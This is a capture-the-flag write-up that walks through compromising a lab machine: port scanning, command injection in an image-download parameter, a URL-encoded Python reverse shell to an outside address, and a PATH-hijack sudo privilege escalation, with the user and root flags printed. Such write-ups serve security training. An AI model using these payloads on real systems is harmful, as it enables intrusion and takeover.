Write-up author: jon-brandy
- NONE
- NONE
- First, let's check all open ports and it's services from the host given.
RESULT
- Based from the output, it seems the machine is running a web application.
- So let's open the webapp.
RESULT
- Let's click this:
RESULT
- Well we don't have any creds, let's check the page source.
RESULT
- Let's check the
.js
file.
RESULT
- Got a hint there, open the link then.
RESULT
- It seems we can download any image we click here.
- Hence, let's see the download request using burpsuite and send it to repeater.
RESULT
- To check whether it's vulnerable to command injection, let's add
;id
behind the value of filetype parameter.
RESULT
- Now let's try to inject command for reverse shell. I used this command from
hacktools
.
python3%20-c%20'import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.12%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)'
- Now set a listeners for port 443. Then paste the payload behind the
jpg;
, next click send.
- Now press
ctrl-d
.
RESULT
- Let's find all the flags!
- Got the user flag!
e89b54a9041e03ea2ea5148f38d1413d
- Then go for the root now.
- Since we're not root, gotta find a way.
- Find a bash script at the
opt
directory.
- Actually i'm stucked here, so i did a small outsource about this challenge and found out that we have to run this command in order to get the root mode:
sudo -l # check our available command
echo bash > find
chmod +x find
sudo PATH=$PWD:$PATH /opt/cleanup.sh
RESULT
- Got the root flag!
09472dbb86cfe57789293cef8965aa07